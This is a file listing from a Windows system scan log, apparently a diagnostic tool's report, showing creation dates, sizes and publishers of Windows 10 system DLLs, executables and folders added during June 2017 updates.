2017-06-14 20:30 - 2017-06-03 11:59 - 01409048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-06-14 20:30 - 2017-06-03 11:59 - 00626528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-06-14 20:30 - 2017-06-03 11:59 - 00311200 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-06-14 20:30 - 2017-06-03 11:59 - 00259400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe
2017-06-14 20:30 - 2017-06-03 11:58 - 21352696 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-06-14 20:30 - 2017-06-03 11:58 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-06-14 20:30 - 2017-06-03 11:58 - 00660384 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll
2017-06-14 20:30 - 2017-06-03 11:58 - 00254176 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2017-06-14 20:30 - 2017-06-03 11:57 - 00371616 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 02228120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystems64.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 01854880 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 01693600 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVIntegration.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 01458592 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 00848288 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVOrchestration.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 00846752 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVClient.exe
2017-06-14 20:30 - 2017-06-03 11:56 - 00844696 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntStreamingManager.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 00697760 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVCatalog.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 00672672 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVPublishing.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 00399264 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVScripting.dll
2017-06-14 20:30 - 2017-06-03 11:55 - 02681760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-06-14 20:30 - 2017-06-03 11:36 - 01150784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2017-06-14 20:30 - 2017-06-03 11:35 - 02259768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-06-14 20:30 - 2017-06-03 11:28 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-06-14 20:30 - 2017-06-03 11:26 - 00266640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\capauthz.dll
2017-06-14 20:30 - 2017-06-03 11:23 - 20373920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-06-14 20:30 - 2017-06-03 11:23 - 06760024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-06-14 20:30 - 2017-06-03 11:23 - 00573856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll
2017-06-14 20:30 - 2017-06-03 11:21 - 01516448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppVEntSubsystems32.dll
2017-06-14 20:30 - 2017-06-03 11:20 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-06-14 20:30 - 2017-06-03 11:14 - 03673088 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-06-14 20:30 - 2017-06-03 11:14 - 00443392 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationExtensions.dll
2017-06-14 20:30 - 2017-06-03 11:14 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmredir.dll
2017-06-14 20:30 - 2017-06-03 11:14 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2017-06-14 20:30 - 2017-06-03 11:14 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2017-06-14 20:30 - 2017-06-03 11:12 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2017-06-14 20:30 - 2017-06-03 11:11 - 02958848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-06-14 20:30 - 2017-06-03 11:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-06-14 20:30 - 2017-06-03 11:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-06-14 20:30 - 2017-06-03 11:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2017-06-14 20:30 - 2017-06-03 11:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-06-14 20:30 - 2017-06-03 11:11 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2017-06-14 20:30 - 2017-06-03 11:10 - 00293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-06-14 20:30 - 2017-06-03 11:10 - 00102400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2017-06-14 20:30 - 2017-06-03 11:10 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCredentialDeployment.exe
2017-06-14 20:30 - 2017-06-03 11:09 - 00271872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll
2017-06-14 20:30 - 2017-06-03 11:09 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\devicengccredprov.dll
2017-06-14 20:30 - 2017-06-03 11:09 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-06-14 20:30 - 2017-06-03 11:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-06-14 20:30 - 2017-06-03 11:07 - 23682048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-06-14 20:30 - 2017-06-03 11:07 - 00778240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2017-06-14 20:30 - 2017-06-03 11:07 - 00721920 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2017-06-14 20:30 - 2017-06-03 11:07 - 00197120 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdboot.exe
2017-06-14 20:30 - 2017-06-03 11:07 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
2017-06-14 20:30 - 2017-06-03 11:06 - 00551936 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll
2017-06-14 20:30 - 2017-06-03 11:05 - 20506624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-06-14 20:30 - 2017-06-03 11:05 - 07336448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-06-14 20:30 - 2017-06-03 11:05 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-06-14 20:30 - 2017-06-03 11:05 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll
2017-06-14 20:30 - 2017-06-03 11:05 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\devicengccredprov.dll
2017-06-14 20:30 - 2017-06-03 11:04 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-06-14 20:30 - 2017-06-03 11:04 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-06-14 20:30 - 2017-06-03 11:04 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-06-14 20:30 - 2017-06-03 11:03 - 19336192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-06-14 20:30 - 2017-06-03 11:03 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-06-14 20:30 - 2017-06-03 11:03 - 00467456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll
2017-06-14 20:30 - 2017-06-03 11:02 - 08245760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-06-14 20:30 - 2017-06-03 11:01 - 06726656 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
2017-06-14 20:30 - 2017-06-03 11:01 - 02804736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-06-14 20:30 - 2017-06-03 11:00 - 03379200 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-06-14 20:30 - 2017-06-03 11:00 - 00933376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2017-06-14 20:30 - 2017-06-03 11:00 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 02672128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 02625024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 02597376 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-06-14 20:30 - 2017-06-03 10:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 01142784 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 00975360 _____ (Microsoft Corporation) C:\WINDOWS\HelpPane.exe
2017-06-14 20:30 - 2017-06-03 10:59 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 05961216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 02650112 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 02516480 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 01888256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 01046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 00827392 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 11870720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 06535168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
2017-06-14 20:30 - 2017-06-03 10:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 02829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 01675264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 00797184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2017-06-14 20:30 - 2017-06-03 10:56 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-06-14 20:30 - 2017-06-03 10:55 - 03656192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-06-14 20:30 - 2017-06-03 10:55 - 02132480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2017-06-14 20:30 - 2017-06-03 10:55 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-06-14 20:30 - 2017-06-03 10:54 - 02341376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2017-06-14 20:30 - 2017-06-03 10:54 - 02298368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-06-14 20:30 - 2017-06-03 10:54 - 00794112 _____ (Microsoft Corporation) C:\WINDOWS\system32\pwcreator.exe
2017-06-14 20:30 - 2017-06-03 10:53 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-06-14 20:30 - 2017-06-03 10:51 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\bfsvc.exe
2017-06-12 21:56 - 2017-06-14 20:22 - 00003292 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-06-12 21:55 - 2017-06-12 21:55 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2017-06-12 21:54 - 2017-06-12 21:54 - 00000020 ___SH C:\Users\ararat\ntuser.ini
2017-06-08 09:54 - 2017-07-03 01:27 - 00000000 ____D C:\Windows.old
2017-06-08 09:54 - 2017-06-08 09:54 - 17365504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 13840384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 08331264 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 07325584 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 06551856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 05821496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 05802968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 05719040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04847928 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 04709528 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04707840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04672848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04537344 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 04446208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04417024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04056576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03803136 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03784704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03332096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03135488 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03116184 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02938880 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02765824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02730496 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 02679296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02635336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02604256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02588160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02443776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02438656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02424016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02347520 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceFlows.DataModel.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02211328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02088960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapGeocoder.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02085280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-06-08 09:54 - 2017-06-08 09:54 - 02008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-06-08 09:54 - 2017-06-08 09:54 - 01984000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceFlows.DataModel.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01911752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01852776 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01818624 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01803264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01706496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01700408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01670496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01657344 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01628160 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01611776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01600512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01583616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01536512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01529384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01506712 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01474800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01463296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01459728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01455592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01450496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01433600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01333136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01325456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01320352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01302528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01295872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01292288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01275904 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01266544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01242624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01219560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01141760 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01120864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01102848 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01085440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01078272 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01076736 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01067008 _____ (Microsoft Corporation) C:\WINDOWS\system32\XboxNetApiSvc.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsPrint.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01055648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01051648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01035264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01028608 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
